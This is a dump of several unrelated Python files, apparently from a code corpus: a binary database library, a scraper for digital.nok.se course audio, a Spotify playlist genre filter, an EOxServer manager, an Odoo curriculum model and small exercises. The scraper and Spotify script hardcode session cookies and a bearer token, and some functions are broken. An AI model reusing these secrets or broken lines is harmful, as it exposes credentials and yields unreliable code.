f)\n\n def open_table(self, name: str, mode: str = \"rb\") -> \"table\":\n \"\"\"Topic-wise data table.\"\"\"\n if hasattr(self, \"endian\"):\n return table(self.path, name, mode, self.endian)\n return table(self.path, name, mode)\n\n def save_file(self, name: str, data: Union[str, bytes], info: str = \"\") -> None:\n \"\"\"Save a file in database.\n\n Parameter\n ---------\n name\n File name.\n data\n Contents to be written in the file.\n info\n Optional metadata for the file, will be added in first line of the file.\n\n Examples\n --------\n >>> db.savefile(\n ... \"example.txt\",\n ... \"Some contents here.\",\n ... \"Original path: /path/to/example.txt\",\n ... )\n\n \"\"\"\n filepath = duplicate_rename(self.path / name)\n splitter = \"\\n=== Written by NECSTDB ===\\n\"\n if isinstance(data, bytes):\n data = bytes(info + splitter, encoding=\"utf-8\") + data\n _ = filepath.write_bytes(data)\n else:\n data = info + splitter + data\n _ = filepath.write_text(str(data))\n\n def read_file(\n self, name: str, asbytes: bool = False\n ) -> Tuple[Union[str, bytes], Union[str, bytes]]:\n \"\"\"Read a file saved in the database.\n\n Parameters\n ----------\n name\n File name, extension inclusive.\n asbytes\n If True, the data will be returned as bytes.\n\n Examples\n --------\n >>> db.read_file(\"example.txt\")\n \"Some contents here.\", \"Original path: /path/to/example.txt\"\n\n \"\"\"\n if asbytes:\n info, data = (\n (self.path / name)\n .read_bytes()\n .split(b\"\\n=== Written by NECSTDB ===\\n\", 1)\n )\n else:\n info, data = (\n (self.path / name)\n .read_text()\n .split(\"\\n=== Written by NECSTDB ===\\n\", 1)\n )\n return data, info\n\n def checkout(self, saveto: os.PathLike, compression: str = None) -> None:\n \"\"\"Archive the database.\n\n Parameters\n ----------\n saveto: PathLike\n Path to the tar file to be created.\n compression: str\n Compression format/program to be used. One of [\"gz\", \"bz2\", \"xz\"].\n\n \"\"\"\n mode = \"w:\"\n if compression is not None:\n mode += compression\n\n tar = tarfile.open(saveto, mode=mode)\n tar.add(self.path)\n tar.close()\n\n def get_info(self) -> pandas.DataFrame:\n \"\"\"Get metadata of all tables in the database.\"\"\"\n names = self.list_tables()\n\n dictlist = []\n for name in names:\n table = self.open_table(name)\n dic = {\n \"table name\": name,\n \"file size [byte]\": table.stat.st_size,\n \"#records\": table.nrecords,\n \"record size [byte]\": table.record_size,\n \"format\": table.format,\n }\n dictlist.append(dic)\n table.close()\n\n df = pandas.DataFrame(\n dictlist,\n columns=[\n \"table name\",\n \"file size [byte]\",\n \"#records\",\n \"record size [byte]\",\n \"format\",\n ],\n ).set_index(\"table name\")\n\n return df\n\n\nclass table:\n \"\"\"Data table for single topic.\n\n Parameters\n ----------\n dbpath: pathlib.Path\n Path to database directory, the direct parent of *.data and *.header files.\n name: str\n Name of table.\n mode: str\n Mode in which the database is opened (e.g. [\"rb\", \"wb\", ...]).\n endian: str\n One of [\"=\", \"<\", \">\"].\n\n Notes\n -----\n Endian specifications [\"@\", \"!\"] are not supported, since numpy doesn't recognize\n them. Though [\"=\"] is supported, the use of it is deprecated since the behavior may\n vary between architectures this program runs on.\n\n \"\"\"\n\n dbpath = \"\"\n data_file = None\n header = {}\n record_size = 0\n format = \"\"\n stat = None\n nrecords = 0\n endian = \"\"\n\n def __init__(\n self, dbpath: pathlib.Path, name: str, mode: str, endian: str = \"<\"\n ) -> None:\n self.dbpath = dbpath\n self.endian = endian\n self.open(name, mode)\n\n self._name = name\n self._mode = mode\n\n def open(self, table_name: str, mode: str) -> None:\n \"\"\"Open a data table of specified topic.\"\"\"\n data_path = self.dbpath / (table_name + \".data\")\n header_path = self.dbpath / (table_name + \".header\")\n\n if not (data_path.exists() and header_path.exists()):\n raise Exception(f\"Table '{table_name}' does not exist.\")\n\n self.data_file = data_path.open(mode)\n with header_path.open(\"r\") as header_file:\n self.header = json.load(header_file)\n\n format_list = [dat[\"format\"] for dat in self.header[\"data\"]]\n self.format = self.endian + \"\".join(format_list)\n self.record_size = struct.calcsize(self.format)\n self.stat = data_path.stat()\n self.nrecords = self.stat.st_size // self.record_size\n\n if self.header.get(\"struct_indices\", False) is False:\n # Infer sizes\n struct_sizes = utils.get_struct_sizes(format_list, self.endian)\n for dat, size in zip(self.header[\"data\"], struct_sizes):\n dat[\"size\"] = size\n self.header[\"struct_indices\"] = True\n\n def close(self) -> None:\n \"\"\"Close the data file of the table.\"\"\"\n self.data_file.close()\n\n def append(self, *data: Any) -> None:\n \"\"\"Append data to the table.\"\"\"\n self.data_file.write(struct.pack(self.format, *data))\n\n def read(\n self, num: int = -1, start: int = 0, cols: List[str] = [], astype: str = \"tuple\"\n ) -> Union[tuple, dict, numpy.ndarray, pandas.DataFrame, bytes]:\n \"\"\"Read the contents of the table.\n\n Parameters\n ----------\n num: int\n Number of records to be read.\n start: int\n Index of first record to be read.\n cols: list of str\n Names of the fields to be picked up (e.g. \"timestamp\").\n astype: str\n One of [\"tuple\", \"dict\", \"structuredarray\", \"dataframe\", \"buffer\"] or their\n aliases, [\"structured_array\", \"array\", \"sa\", \"data_frame\", \"pandas\", \"df\",\n \"raw\"].\n\n \"\"\"\n mm = mmap.mmap(self.data_file.fileno(), 0, prot=mmap.PROT_READ)\n mm.seek(start * self.record_size)\n\n if cols == []:\n data = self._read_all_cols(mm, num)\n else:\n if isinstance(cols, str):\n raise ValueError(\"Column names should be given as list of str.\")\n data = self._read_specified_cols(mm, num, cols)\n\n mm.close()\n return self._astype(data, cols, astype)\n\n def _read_all_cols(self, mm: mmap.mmap, num: int) -> bytes:\n \"\"\"Read all columns of the data table.\"\"\"\n if num == -1:\n size = num\n else:\n size = num * self.record_size\n return mm.read(size)\n\n def _read_specified_cols(\n self, mm: mmap.mmap, num: int, cols: List[Dict[str, str]]\n ) -> bytes:\n \"\"\"Read specified columns of the data table.\n\n Notes\n -----\n The byte count of this function may contain bugs. For data which are not\n aligned, the count would be correct, but byte count for aligned data is much\n difficult, hence the implementation may not be perfect.\n One resolution for this problem would be to read all columns, then drop\n unnecessary columns.\n\n \"\"\"\n commands = []\n for _col in self.header[\"data\"]:\n elemsize = struct.calcsize(_col[\"format\"])\n if _col[\"key\"] in cols:\n commands.append({\"cmd\": \"read\", \"size\": elemsize})\n commands.append({\"cmd\": \"seek\", \"size\": _col[\"size\"] - elemsize})\n else:\n commands.append({\"cmd\": \"seek\", \"size\": _col[\"size\"]})\n\n if num == -1:\n num = (mm.size() - mm.tell()) // self.record_size\n\n draw = b\"\"\n for _ in range(num):\n for _cmd in commands:\n if _cmd[\"cmd\"] == \"seek\":\n mm.seek(_cmd[\"size\"], os.SEEK_CUR)\n else:\n draw += mm.read(_cmd[\"size\"])\n return draw\n\n def _astype(\n self, data: bytes, cols: List[Dict[str, Any]], astype: str\n ) -> Union[tuple, dict, numpy.ndarray, pandas.DataFrame, bytes]:\n \"\"\"Map the astype argument to corresponding methods.\"\"\"\n if cols == []:\n cols = self.header[\"data\"]\n else:\n cols = [_col for _col in self.header[\"data\"] if _col[\"key\"] in cols]\n\n def DataFormatError(e: Union[Exception, str] = \"\"):\n return ValueError(\n str(e) + \"\\nThis may caused by wrong specification of data format.\"\n \"Try ``db.open_table(table_name).recovered.read()`` instead of\"\n \"``db.open_table(table_name).read()``.\"\n )\n\n if astype in [\"tuple\"]:\n try:\n return self._astype_tuple(data, cols)\n except struct.error as e:\n raise DataFormatError(e)\n\n elif astype in [\"dict\"]:\n try:\n return self._astype_dict(data, cols)\n except struct.error as e:\n raise DataFormatError(e)\n\n elif astype in [\"structuredarray\", \"structured_array\", \"array\", \"sa\"]:\n try:\n return self._astype_structured_array(data, cols)\n except ValueError as e:\n raise DataFormatError(e)\n\n elif astype in [\"dataframe\", \"data_frame\", \"pandas\", \"df\"]:\n try:\n return self._astype_data_frame(data, cols)\n except struct.error as e:\n raise DataFormatError(e)\n\n elif astype in [\"buffer\", \"raw\"]:\n return data\n\n else:\n raise ValueError(f\"Unknown return type {astype}.\")\n\n def _astype_tuple(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> Tuple[Tuple[Any]]:\n \"\"\"Read the data as tuple of tuple.\"\"\"\n fmt = self.endian + \"\".join([col[\"format\"] for col in cols])\n return tuple(struct.iter_unpack(fmt, data))\n\n def _astype_dict(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> List[Dict[str, Any]]:\n \"\"\"Read the data as list of dict.\"\"\"\n offset = 0\n dictlist = []\n while offset < len(data):\n dict_ = {}\n\n for col in cols:\n size = struct.calcsize(col[\"format\"])\n if \"x\" in col[\"format\"]: # Pad field\n offset += col[\"size\"]\n continue\n dat = struct.unpack(col[\"format\"], data[offset : offset + size])\n if len(dat) == 1:\n (dat,) = dat\n\n dict_[col[\"key\"]] = dat\n offset += col[\"size\"]\n\n dictlist.append(dict_)\n\n return dictlist\n\n def _astype_data_frame(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> pandas.DataFrame:\n \"\"\"Read the data as pandas.DataFrame.\"\"\"\n data = self._astype_dict(data, cols)\n return pandas.DataFrame.from_dict(data)\n\n def _astype_structured_array(\n self, data: bytes, cols: List[Dict[str, Any]]\n ) -> numpy.ndarray:\n \"\"\"Read the data as numpy's structured array.\"\"\"\n formats = [col[\"format\"] for col in cols]\n\n def parse_dtype(format_character: str) -> str:\n def str_format(length: Union[str, int], count: Union[str, int]):\n count = count if int(count) > 1 else \"\"\n return f\"{count}S{length}\"\n\n format_character = re.sub(\n r\"^([\\d+s]+)$\",\n lambda m: str_format(m.group(1).split(\"s\")[0], m.group(1).count(\"s\")),\n format_character,\n )\n\n format_character = format_character.replace(\"x\", \"V\")\n return self.endian + format_character\n\n np_formats = [parse_dtype(col[\"format\"]) for col in cols]\n keys = [col[\"key\"] for col in cols]\n offsets = utils.get_struct_indices(formats, self.endian)[:-1]\n\n pad = [\"x\" in col[\"format\"] for col in cols]\n data_field = [k for k, p in zip(keys, pad) if not p]\n\n dtype = numpy.dtype({\"names\": keys, \"formats\": np_formats, \"offsets\": offsets})\n return numpy.frombuffer(data, dtype=dtype)[data_field]\n\n @property\n def recovered(self) -> \"table\":\n \"\"\"Restore the broken data caused by bugs in logger.\n\n Examples\n --------\n >>> db = necstdb.opendb(\"path/to/db\")\n >>> data = db.open_table(\"topic_name\").recovered.read(astype=\"array\")\n array([...])\n\n Notes\n -----\n The details of the bugs are:\n - bool data are dumped as bool, but the formatting character in the header was\n int32's\n When other bug is found, this property should determine what the problem is,\n based on the value of the data (e.g. timestamp contains extremely small number\n such as 1e-308)\n\n \"\"\"\n return recover(self)\n\n\ndef opendb(path: os.PathLike, mode: str = \"r\") -> \"necstdb\":\n \"\"\"Quick alias to open a database.\n\n Parameters\n ----------\n path: PathLike\n Path to the database directory, the direct parent of *.data and *.header files.\n mode: str\n Mode in which the database is opened (e.g. [\"rb\", \"wb\", ...]).\n\n \"\"\"\n return necstdb(path, mode)\n\n\ndef relog(db: necstdb, starttime: float, endtime: float):\n \"\"\"Create time-subtracted necstdb.\n\n Parameters\n ----------\n db: necstdb\n Original necstdb to be subtracted\n starttime: float\n Start subtraction from this time\n endtime: float\n End subtraction from this time\n\n \"\"\"\n newdb = opendb(db.path.stem + \"_extracted\", mode=\"w\")\n\n for name in db.list_tables():\n print(name)\n table = db.open_table(name)\n data = table.read(astype=\"df\")\n timestamp_key = \"time\"\n t = data[timestamp_key].astype(float)\n idx = t[(starttime <= t) & (t <= endtime)].index\n extracted_data = data.iloc[idx]\n\n header = table.header\n header.pop(\"struct_indices\")\n newdb.create_table(name, header)\n newtable = newdb.open_table(name, \"wb\")\n\n for row in extracted_data.itertuples(index=False):\n _data = utils.flatten_data(list(row))\n newtable.append(*_data)\n\n newtable.close()\n newdb.save_file(path=db.path.stem + \"_extracted\", content=\"subtracted database\")\n","sub_path":"necstdb/necstdb.py","file_name":"necstdb.py","file_ext":"py","file_size_in_byte":17692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"269592488","text":"import os\nfrom pathlib import Path\nimport requests\nfrom bs4 import BeautifulSoup\nimport eyed3\nimport re\n\ncookies = {\n '_ga': 'GA1.2.2117970736.1586416913',\n '_gid': 'GA1.2.966114317.1586416913',\n '_fbp': 'fb.1.1586416913469.1269885241',\n 'cookieconsentaccepted': 'true',\n 'JSESSIONID': '11571505CF3168014925715D03D05F36',\n 'COOKIE_SUPPORT': 'true',\n 'LFR_SESSION_STATE_3907749': '1586455036919',\n 'GUEST_LANGUAGE_ID': 'en_US',\n 'LFR_SESSION_STATE_20120': '1586453838446',\n '_gat': '1',\n}\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',\n 'Accept': 'audio/webm,audio/ogg,audio/wav,audio/*;q=0.9,application/ogg;q=0.7,video/*;q=0.6,*/*;q=0.5',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Range': 'bytes=0-',\n 'Connection': 'keep-alive',\n 'Referer': 'https://digital.nok.se/web/site-709522/state-jurdcojshera/page-710868',\n 'TE': 'Trailers',\n}\n\ntracks = None\nparams = None\nparsed_html = None\nkapitel_name = None\nkapitel_folder = None\nbooks = [('A1_A2', 20), ('B1_B2', 18), ('B2_C1', 12)]\n# books = [('A1_A2', 1)]\nHTML_ROOT = Path('HTML') # os.path.join(os.path(os.getcwd()).parent, \"HTML\")\")\nMP3_ROOT = Path('mp3') # os.path.join(os.getcwd().parent, \"mp3\")\n\n\ndef get_and_save_sound_files(request_params, file_name):\n response = requests.get('https://digital.nok.se/o/blob-download',\n headers=headers, params=request_params, cookies=cookies)\n with open(file_name, 'wb') as file:\n file.write(response.content)\n\n\ndef parse_html_page(html_page):\n global parsed_html\n file_name = os.path.join(os.getcwd(), html_page)\n with open(file_name) as html_file:\n html = html_file.read()\n parsed_html = BeautifulSoup(html, features=\"html.parser\")\n\n\ndef find_kapitel_name():\n global kapitel_name\n for element in parsed_html.find_all('span', attrs={'class': 'nok-breadcrumb'}):\n kapitel_name = element.string.strip()\n\n\ndef find_tracks():\n global tracks\n tracks = []\n for element in parsed_html.find_all('div', attrs={'class': 'cloubi-library-media-metadatadisplay-content'}):\n content = element.string\n if content.find(\"mp3\") > 0:\n # print(content.strip())\n tracks.append(content.strip().replace(\"SpÃ¥r\", \"Track\"))\n\n\ndef find_blobs_and_tokens():\n global params\n params = []\n for element in parsed_html.find_all('source'):\n # print(element['src'])\n src = element['src']\n blob = src[src.find(\"=\") + 1:src.find(\"&\")]\n # print(blob)\n token = src[src.find(\"token=\") + 6:]\n # print(token)\n params.append(\n (\n ('blob', blob),\n ('token', token),\n )\n\n )\n\n\ndef create_kapitel_folder(book):\n global kapitel_folder\n book_folder = os.path.join(MP3_ROOT, 'Rivstart_' + book)\n if not os.path.isdir(book_folder):\n os.mkdir(book_folder)\n kapitel_folder = os.path.join(book_folder, kapitel_name)\n print(kapitel_folder)\n if not os.path.isdir(kapitel_folder):\n os.mkdir(kapitel_folder)\n\n\ndef process_tracks(book, kapitel):\n for i in range(len(tracks)):\n tracknum = re.sub(\"Spår |.mp3\", \"\", tracks[i])\n print(tracknum)\n # print(tracks[i])\n file_name = os.path.join(kapitel_folder, tracks[i])\n get_and_save_sound_files(params[i], file_name)\n add_tags(book, kapitel, file_name, tracknum)\n save_file_to_root(book, kapitel, file_name, tracknum)\n\n\ndef save_file_to_root(book, kapitel, file_name, tracknum):\n final_file = os.path(\"{book}K{kapitel}T{tracknum}\")\n\n\n\ndef add_tags(book, kapitel, file_name, tracknum):\n # audiofile = eyed3.load('{book}_{kapitel}_{track}.mp3')\n audiofile = eyed3.load(file_name)\n audiofile.tag.artist = f\"Sueco{book}\"\n audiofile.tag.album = f\"{book}K{kapitel}\"\n audiofile.tag.title = f\"{book}K{kapitel}T{tracknum}\"\n audiofile.tag.track_num = tracknum\n\n audiofile.tag.save()\n\n\ndef process_html_page(html_page, book, kapitel):\n parse_html_page(html_page)\n find_kapitel_name()\n find_tracks()\n find_blobs_and_tokens()\n create_kapitel_folder(book)\n process_tracks(book, kapitel)\n\n\ndef main():\n html_page = os.path.join(HTML_ROOT, 'Rivstart_{book}_Kap{kapitel}.html')\n for book in books:\n print(\"book\", book)\n for i in range(1, book[1] + 1):\n print(\"chapter\", i)\n process_html_page(html_page.format(book=book[0], kapitel=str(i)), book[0], str(i))\n","sub_path":"src/ripstart/html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592443832","text":"# Default Imports\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\ndata = read_data()\n\n# Your Solution\ndef bowled_out(data=data):\n\n deliv=data['innings'][1]['2nd innings']['deliveries']\n # Write your code here\n d=list()\n bowled_players = list()\n d=list()\n count = 0\n for i in range(len(deliv)):\n d.append(deliv[i].items()[0][0])\n\n for i in range(len(deliv)):\n temp = d[i]\n if(deliv[i][temp].has_key('wicket')):\n if (deliv[i][temp]['wicket']['kind'] == 'bowled'):\n bowled_players.append(deliv[i][temp]['wicket']['player_out'])\n\n return bowled_players\n","sub_path":"q06_bowled_players/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266933580","text":"#-------------------------------------------------------------------------------\n#\n# Project: EOxServer \n# Authors: Stephan Krause \n# Stephan Meissl \n# Martin Paces \n#\n#-------------------------------------------------------------------------------\n# Copyright (C) 2011 EOX IT Services GmbH\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \n# copies of the Software, and to permit persons to whom the Software is \n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies of this Software or works derived from this Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#-------------------------------------------------------------------------------\n\nfrom eoxserver.resources.coverages.exceptions import ManagerError\n\n#-------------------------------------------------------------------------------\n\nfrom eoxserver.resources.coverages.managers.coverage import CoverageManager\nfrom eoxserver.resources.coverages.managers.coverage import CoverageManagerDatasetMixIn\nfrom eoxserver.resources.coverages.managers.coverage import CoverageManagerEOMixIn\n\n#-------------------------------------------------------------------------------\n\nclass EODatasetManager(CoverageManager, CoverageManagerDatasetMixIn, CoverageManagerEOMixIn):\n def _create(self, coverage_id, **kwargs):\n location = self._get_location(kwargs)\n \n metadata_location = self._get_metadata_location(location, kwargs)\n \n data_package = self._create_data_package(\n location, metadata_location\n )\n \n existing_coverage = self._get_existing_coverage(data_package)\n \n if existing_coverage:\n \n if self._validate_type(existing_coverage):\n return existing_coverage\n else:\n raise ManagerError(\n \"Another coverage with different type, but the same data exists already.\"\n )\n \n else:\n \n geo_metadata = self._get_geo_metadata(data_package, kwargs)\n \n range_type_name = self._get_range_type_name(kwargs)\n \n layer_metadata = self._get_layer_metadata(kwargs)\n \n eo_metadata = self._get_eo_metadata(data_package, kwargs)\n \n data_source = kwargs.get(\"data_source\")\n \n containers = self._get_containers(kwargs)\n \n visible = kwargs.get(\"visible\", True)\n \n return self._create_coverage(\n coverage_id,\n data_package,\n data_source,\n geo_metadata,\n range_type_name,\n layer_metadata,\n eo_metadata,\n container=kwargs.get(\"container\"),\n containers=containers,\n visible=visible\n )\n \n \n def _prepare_update_dicts(self, link_kwargs, unlink_kwargs, set_kwargs):\n super(EODatasetManager, self)._prepare_update_dicts(link_kwargs, unlink_kwargs, set_kwargs) \n \n link_kwargs[\"containers\"] = self._get_containers(link_kwargs)\n unlink_kwargs[\"containers\"] = self._get_containers(unlink_kwargs)\n\n#-------------------------------------------------------------------------------\n","sub_path":"eoxserver/resources/coverages/managers/eo_ds.py","file_name":"eo_ds.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"42071214","text":"__author__ = 'bdm4, James Allsup'\n\n\nimport requests, json\nimport subprocess\nimport sys\nimport csv\nimport urllib3\nimport sys\nfrom time import sleep\nfrom datetime import datetime\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\n#This script:\n# 1) Retrieves tracks and associated genres from a playlist\n# 2) Filters out tracks by genre\n# 3) Sorts the tracks by release date ascending\n# 4) Adds the remaining tracks to a new playlist\n\n# INSTRUCTIONS:\n# 1) Add valid access_token\n# 2) Add search playlist and target playlist fields\n# 3) Add genre to filter on\naccess_token = 'BQCd23LMG-J5Nrh6DdEnc7P2_8zvm-exsM4WJWk5_Eqg6cAW02Ex8jsjjhLvqAve9oLaOc7-fiT1QYEHUnH2FOil_9DpkTLwszcXh90aAPKoDB9hrPuwNn3SasUyzKWXS8Q3InohT4gVD7Th6YbDAjbJTybYLaXRyX0A5tMQ8UQe_dINlzawJmKSoEgTcQ4nKs0'\n\nsearch_playlist_id = '4wYwzTatuFG1G5Mm6QxDf6'\npopulate_playlist_id = '67tq6cEqQ2zBdt1Y2HkHUO'\nsearch = 'pop'\n\napi_call_headers = {'Authorization': 'Bearer ' + access_token}\n\n#get track info and artist ids\ntotal_tracks = 3248\ntrack_it = 0\ndata = {}\ndata['tracks'] = []\nx=0\n#max is 100\nlimit=100\nwhile x<30:\n offset=str(x*limit)\n getPlaylistItems = \"https://api.spotify.com/v1/playlists/\" + search_playlist_id + \"/tracks?fields=items(track.artists(id),track.name,track.id,track.album.release_date)&limit=\" + str(limit) + \"&offset=\" + offset\n\n api_call_response = requests.get(getPlaylistItems, headers=api_call_headers, verify=False)\n if api_call_response.status_code != 200:\n print(api_call_response)\n sys.exit(\"API Request Error\")\n json_data = json.loads(api_call_response.text)\n\n for item in json_data['items']:\n trackName=item['track']['name']\n trackID=item['track']['id']\n artistID=item['track']['artists'][0]['id']\n #standardize release date formats\n if len(item['track']['album']['release_date'])==4:\n release_date = int(item['track']['album']['release_date'] + \"0101\")\n if len(item['track']['album']['release_date'])==7:\n release_date = int(item['track']['album']['release_date'][:4] + \"0101\")\n if len(item['track']['album']['release_date'])>7:\n release_date = int(item['track']['album']['release_date'][:4] + item['track']['album']['release_date'][5:7] + item['track']['album']['release_date'][8:10])\n #releaseDate=item['track']['album']['release_date']\n data['tracks'].append({\n 'trackName': trackName,\n 'trackID': trackID,\n 'artistID': artistID,\n 'releaseDate': release_date\n })\n print(\"Track \" + str(track_it) + \"/\" + str(total_tracks))\n track_it+=1\n x+=1\n\n#build artist/genre dataset\n#artist limit max is 50\nartist_limit=50\nartist_count=0\nprogress_count=0\nartist_data = {}\nartist_data['artists'] = []\ngetPlaylistItems=\"https://api.spotify.com/v1/artists?ids=\"\n\nfor track in data['tracks']:\n if artist_count==0:\n getPlaylistItems += track['artistID']\n artist_count+=1\n progress_count+=1\n print(\"Genre \" + str(progress_count) + \"/\" + str(total_tracks))\n\n elif artist_count0:\n filteredData['tracks'].append({\n 'trackID': track['trackID'],\n 'releaseDate': track['releaseDate']\n })\nif len(filteredData['tracks'])==0:\n sys.exit(\"No Tracks Found\")\nelse:\n print(str(len(filteredData['tracks'])) + \" tracks found\" )\n\n\n\n#sort by release datetime\n#sortedFilteredData = sorted(filteredData['tracks'], key=lambda x: datetime.strptime(x['releaseDate'], '%Y-%m-%d'))\nsortedFilteredData = sorted(filteredData['tracks'], key = lambda x:x[\"releaseDate\"])\nprint(sortedFilteredData)\n\n#create playlist\ncountlimit=0\ntracklist={}\ntracklist['uris'] = []\nuristring=\"\"\nfor track in sortedFilteredData:\n ##limit is 100\n if countlimit <90:\n uristring+= \"spotify:track:\" + track['trackID']\n tracklist['uris'].append(uristring)\n uristring=\"\"\n countlimit+=1\n else:\n getPlaylistItems = \"https://api.spotify.com/v1/playlists/\" + populate_playlist_id + \"/tracks\"\n api_call_response = requests.post(getPlaylistItems, data=json.dumps(tracklist), headers=api_call_headers, verify=False)\n if api_call_response.status_code != 201:\n print(\"API Request Error\")\n tracklist={}\n tracklist['uris'] = []\n uristring+= \"spotify:track:\" + track['trackID']\n tracklist['uris'].append(uristring)\n uristring=\"\"\n countlimit=1\n continue\n\ngetPlaylistItems = \"https://api.spotify.com/v1/playlists/\" + populate_playlist_id + \"/tracks\"\napi_call_response = requests.post(getPlaylistItems, data=json.dumps(tracklist), headers=api_call_headers, verify=False)\nif api_call_response.status_code != 201:\n print(\"API Request Error\")\n","sub_path":"filterplaylistbygenre.py","file_name":"filterplaylistbygenre.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479160124","text":"# 백준 11722 가장 긴 감소하는 부분 수열\n# DP\nimport sys\ninput = sys.stdin.readline\nn = int(input())\ndp = [1 for _ in range(n)]\na = list(map(int, input().split()))\n\nfor i in range(n):\n for j in range(i):\n if a[i] < a[j]: # 오른쪽보다 왼쪽이 크면 +1 \n dp[i] = max(dp[i], dp[j] + 1)\nprint(max(dp))\n\n","sub_path":"11722.py","file_name":"11722.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"4520930","text":"from django.conf import settings\nfrom importlib import import_module\n\n\nclass GlitterApp(object):\n \"\"\"\n A simple class to store Glitter App config options.\n \"\"\"\n def __init__(self, name, url_conf, namespace=None):\n self.name = name\n self.url_conf = url_conf\n self.namespace = namespace\n\n def __str__(self):\n return self.name\n\n\nclass GlitterAppPool(object):\n \"\"\"\n An interface to the Glitter App configs in the current project.\n\n Will lazily discover Glitter App configs when needed.\n \"\"\"\n def __init__(self):\n self.glitter_apps = {}\n self.discovered = False\n\n def get_glitter_app(self, glitter_app_name):\n \"\"\"\n Retrieve the Glitter App config for a specific Glitter App.\n \"\"\"\n if not self.discovered:\n self.discover_glitter_apps()\n\n try:\n glitter_app = self.glitter_apps[glitter_app_name]\n return glitter_app\n except KeyError:\n return None\n\n def discover_glitter_apps(self):\n \"\"\"\n Find all the Glitter App configurations in the current project.\n \"\"\"\n for app_name in settings.INSTALLED_APPS:\n module_name = '{app_name}.glitter_apps'.format(app_name=app_name)\n try:\n glitter_apps_module = import_module(module_name)\n if hasattr(glitter_apps_module, 'apps'):\n self.glitter_apps.update(glitter_apps_module.apps)\n except ImportError:\n pass\n\n self.discovered = True\n\n def get_glitter_apps(self):\n if not self.discovered:\n self.discover_glitter_apps()\n return self.glitter_apps\n\n\nglitter_app_pool = GlitterAppPool()\n","sub_path":"glitter/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401720704","text":"# _*_ coding: utf-8 _*_\nfrom odoo import models, fields, api, _\n\nclass Curriculum(models.Model):\n _name = 'curriculum'\n _rec_name = 'date'\n\n name = fields.Char(string='課程', related='batch_id.name')\n batch_id = fields.Many2one('jt.batch', '班級名稱')\n date = fields.Date(string='日期')\n class_time = fields.Text(string='上課時間')\n course_line_id = fields.Many2one('jt.course.line', string='級數')\n teacher = fields.Many2one(comodel_name='jt.teacher', string='講師')\n class_room = fields.Many2one(comodel_name='jptip.class.room', string='教室')\n details = fields.One2many('curriculum.line', 'curriculum_id', string='班級課表')\n state = fields.Selection(selection=[('1', '未建立課堂點名'), ('2', '已建立課堂點名')], default='1', string='狀態')\n event_batch = fields.Boolean(string='活動課程', track_visibility='onchange')\n company_id = fields.Many2one('res.company', '分校')\n attendance_ids = fields.One2many('jt.attendance','curriculum_id')\n count_attendance_ids = fields.Integer(compute='_compute_attendance_count')\n morning = fields.Boolean(string='上午')\n afternoon = fields.Boolean(string='下午')\n night = fields.Boolean(string='晚間')\n\n def open_attendance_list(self):\n action = self.env.ref('jptip_core.attendance_view_action').read()[0]\n action['domain'] = [('curriculum_id', '=', self.id)]\n return action\n\n def _compute_attendance_count(self):\n for line in self:\n line.count_attendance_ids = len(line.attendance_ids)\n\n def roll_call(self):\n for line in self.details:\n attendance_id = self.env['jt.attendance'].create({\n 'batch_id': line.batch_id.id,\n 'timetable_id': line.timetable_id.id,\n 'company_id': line.company_id.id,\n 'curriculum_id': self.id,\n 'course_line_id': self.course_line_id.id,\n })\n lines = attendance_id.exam_lines()\n attendance_id.write({\n 'lines_id': [(6, 0, lines)]\n })\n self.state = '2'\n\nclass CurriculumLine(models.Model):\n _name = 'curriculum.line'\n\n curriculum_id = fields.Many2one(comodel_name='curriculum', string='課堂資訊')\n batch_id = fields.Many2one('jt.batch', '課程')\n timetable_id = fields.Many2one('class.timetable', '課堂')\n start_time = fields.Many2one('jt.time.session.manager', related='timetable_id.class_time_begin', store=True)\n company_id = fields.Many2one('res.company', '分校')","sub_path":"addons_jptip/jptip_core/models/curriculum.py","file_name":"curriculum.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"153317382","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 5 19:32:05 2017\n\n@author: 